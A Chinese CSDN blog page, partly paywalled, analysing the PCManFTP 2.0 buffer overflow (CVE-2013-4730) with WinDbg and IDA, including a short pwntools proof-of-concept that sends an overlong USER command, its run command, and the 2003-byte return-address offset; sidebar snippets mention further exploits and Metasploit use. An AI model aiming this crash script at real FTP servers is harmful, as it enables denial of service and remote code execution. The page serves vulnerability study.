PCManFTP2.0漏洞分析

最新推荐文章于 2024-08-26 22:18:05 发布
最新推荐文章于 2024-08-26 22:18:05 发布
阅读量860 收藏
点赞数 1
分类专栏: 二进制漏洞分析 文章标签: windows 漏洞 ftp服务器 微软 软件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kostart123/article/details/77837944
版权
本文详细分析了PCManFTP2.0 (CVE-2013-4730)的溢出漏洞,通过winDbg调试,发现该漏洞发生在函数内部的sprintf调用,导致返回地址被覆盖,可能执行任意指令。由于Windows DEP保护,作者并未绕过,而是直接利用漏洞弹出计算器。
摘要由CSDN通过智能技术生成

PCManFTP2.0 (CVE-2013-4730)漏洞分析

简介

pcManFTP是一款FTP服务器软件,它的2.0版本在接受命令时,
如果命令后的字符串过长会发生溢出,该溢出漏洞可导致执行任意机器指令。

漏洞分析环境

OS:                 Microsoft Windows 10 64bit 专业版
Software:           PCManFTP 2.0
winDbg:             6.12.2.633
IDAPro:             6.8 绿色版
python:             python 2.7

漏洞分析

参考了k0shl大佬的视频https://www.ichunqiu.com/qad/course/56129

编写了如下的python脚本用作poc,文件名:poc.py

#!/usr/bin/env python 
# coding=utf-8        
# fileName: poc.py
# usage: python poc.py ip port payloadNum

from pwn import *     
import sys            

RHOST = sys.argv[1]   
RPORT = int(sys.argv[2])
payload = cyclic(int(sys.argv[3])) #用于快速定位漏洞触发位置

r = remote(RHOST,RPORT)
print r.recv(1024)
r.send('USER '+payload+'\r\n')                                                      
print r.recv(1024)    
r.close()

然后打开winDbg,这里使用了打开的方法调试PCManFTP2.exe,直接输入g命令执行。
然后执行如下命令运行poc.py

python poc.py 192.168.0.103 21 2048

这时由于产生了异常winDbg被断下

01

可以看到eip被覆盖为0x61616275,使用cyclic -l 0x61616275命令可得到从缓冲区到返回地址一共有2003个字节

02

下面进行分析看是哪个函数调用使缓冲区溢出了。执行kb命令可以发现,整个栈空间大都被畸形字符串覆盖了

03

这里无法通过堆栈回溯找到上层的调用。由于软件是网络软件,在接受客户端命令时可能会调用recv()的接受函数,这时打开ida加载pcmanftp搜索文本recv

04

找到了两处recv()的调用,重新打开winDbg并下这两处的断点,输入g继续执行

bp 4029d5
bp 40563e

执行poc.py,windbg断在4029d5处,在输入g继续执行发现eip又被覆盖为61616275,说明缓冲区被覆盖的位置在第一次触发断点之后,而且40563e位置的断点没有触发可以删除。再次打开winDbg下断点bp 4029d5,执行poc并断下后,查看函数参数

05

recv函数的原型是<

最低0.47元/天 解锁文章
r00tnb
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PCMan FTP Server缓冲区溢出漏洞分析与利用
giantbranch的专栏
03-26 4962
简要介绍这个软件是台湾国立阳明大学医学系的一个学生在大四的时候写的,这个漏洞是有CVE的(CVE-2013-4730),软件应该还挺普及的,这是一个缓冲区溢出漏洞 具体exp可以点这里 实验用pocimport socket as s from sys import argv # if(len(argv) != 4): print "USAGE: %s host <user> <pass
漏洞分析报告-PCManFTP v2.0(CVE-2013-4730)
dbhri9673的博客
05-30 208
PCManFTP v2.0(CVE-2013-4730)漏洞分析报告 软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2005-01-01 操作系统:Windows XP/2003/7/8.1/10 漏洞编号:CVE-2013-4730 危害等级:高危...
PCManFTP v2.0(CVE-2013-4730)漏洞分析
datouyu0824的博客
03-21 761
1. 软件简介 PCMan's FTP Server是洪任谕程序员所研发的一套FTP服务器软件。该软件具有体积小、功能简单等特点。 2. 漏洞成因 PCMan's FTP Server 2.0.0版本中存在缓冲区溢出漏洞。 该软件由于未能有效处理FTP命令的长度字符(最大0x1000),进而在调用字符串拷贝函数时(和sprintf功能相同)未判断长度引发栈溢出漏洞,导致攻击者可以远程执行任何命令。 用于FTP登录的“USER”命令即可以触发此漏洞,也就是可以在未获取FTP的访问权限的前提下,就
PCManFTP v2.0漏洞分析
ZK_1874的博客
10-28 576
PCManFTP v2.0漏洞分析
ftp协议类漏洞研究-结合snort(一)
Yale的博客
04-18 2466
cve-2004-1166 漏洞描述: Microsoft Internet Explorer 6.0.2800.1106及更早版本中的CRLF注入漏洞允许远程攻击者通过ftp:// URL执行任意FTP命令,该URL在ftp command之前包含一个URL编码的换行符(“%0a”),这会导致命令插入到生成的FTP会话中,如使用PORT command所示。 此漏洞是由于ASCII控制字符处理不...
PCManFTP v2.0(CVE-2013-4730)漏洞分析报告
qq_32843153的博客
08-17 688
PCManFTP v2.0(CVE-2013-4730)漏洞分析报告 软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2005-01-01 操作系统:Windows XP/2003/7/8.1/10 漏洞编号:CVE-2013-4730 危害等级:高危  漏洞类型:缓冲区溢出 威胁类型:远程 
漏洞分析报告-FTP.docx
10-24
### 漏洞分析报告-FTP #### 一、背景介绍 本次报告主要针对的是北京蓝森科技有限公司研发的PCMan's FTP Server v2.0中存在的一个严重安全漏洞(CVE-2013-4730)。该漏洞属于典型的缓冲区溢出类型,能够被远程攻击...
漏洞分析PCMan FTP Server缓冲区溢出漏洞分析与利用 (CVE-2013-4730)
Hades的博客
05-24 3828
PCMan FTP Server缓冲区溢出漏洞分析与利用(CVE-2013-4730)                                                                                                        作者:Hades0x0. 漏洞等级软件名称:PCMan FTP Server 软件版本:2.0.7 漏...
PCManFTP 2.0.7
03-12
PCmanFTP 2.0.7 的USER字段存在缓冲区溢出漏洞,可以精心构造ftp请求,造成RCE攻击。 参考文章:https://blog.csdn.net/weixin_44180446/article/details/104796768
PCMan-FTP+溢出脚本
01-17
PCMan-FTP+溢出脚本,实战渗透PcMan-FTP,由冰河大神亲自整理奉献
redhat5-ftp漏洞rpm包
08-11
redhat5-ftp漏洞CVE-2011-0762的漏洞补丁,rpm -Uvh vsftpd-2.0.5-16.el5_6.1.i386.rpm
PCManFTP v2.0(CVE-2013-4730)漏洞分析报告
w_g3366的博客
08-02 637
文章目录PCManFTP v2.0漏洞分析报告1.软件简介2.漏洞成因3.构造触发漏洞的POC4.构造Exploit5.漏洞利用 PCManFTP v2.0漏洞分析报告 软件名称 PCManFTP 操作系统 Windows XP 软件版本 2.0 漏洞编号 CVE-2013-4730 漏洞模块 PCManFTPD2.exe 危害等级 超危 模块版本 2.0.7 漏洞类型 缓...
FTP协议简单分析既历史漏洞介绍
南迪叶先森
06-30 1279
来源:https://www.freebuf.com/vuls/272975.html 话说在前面 节日在家无聊看完了kali linux2这本书,对书中一些知识比较感兴趣,于是才有了这篇文章。 协议介绍 FTP(File Transfer Protocol)文件传输协议,在TCP/IP协议族中属于应用层协议运行于TCP协议之上是一种可靠的传输协议,主要功能用于实现用户间文件分发共享,以及网络管理者在进行设备版本升级、日志下载和配置保存等业务操作时,均会使用到FTP功能。ftp协议是采用C/S结构。也就.
简单的metasploit使用,vsftpd漏洞利用
花儿与少年的博客
09-20 7085
先扫描主机开启的服务和端口及版本号,存在误报 看到有个vsftpd2.0.8,据说2.3.4存在后门漏洞,没这个好运气扫到,就简单的练习下流程 下面利用metasploit实施攻击过程,进入metasploit命令行命令为:msfconsole,search vsftpd,搜索有关vsftpd的相关工具和攻击载荷。查找结果如下: 设置好参数后,run运行即可,(会话未创建no s...
4.1、漏洞利用-FTP漏洞
c10udz的博客
09-04 2103
ftp协议:文件传输协议,使用客户/服务器(C/S)模式,用于Internet上的控制文件的双向传输(上传下载),属于网络传输协议的应用层,使用21号端口。nmap --script vuln -p 21 192.168.12.129 //漏洞探测。nmap -p 21 192.168.12.129 //扫描靶机21端口是否开启。攻击机:kali、IP=192.168.12.128。//使用nc登录靶机,密码可为空或任意,大小写皆可。FTP文件传输格式:(1)ASCII(2)二进制。
Java-List工具类
最新发布
兴趣是最好的老师
08-26 393
将列表转换为其他类型的列表:convertList 方法将一个列表转换为另一个类型的列表。分割列表:splitList 方法将列表分割成多个子列表,每个子列表包含指定数量的元素。扁平化嵌套列表:flattenList 方法用于将嵌套的列表结构扁平化为单一层次的列表。转换列表中的元素:transformList 方法允许使用函数来转换列表中的每个元素。过滤列表:filterList 方法用于过滤列表中的元素,只保留满足条件的元素。计算列表元素的平均值:averageList 方法计算列表中所有元素的平均值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值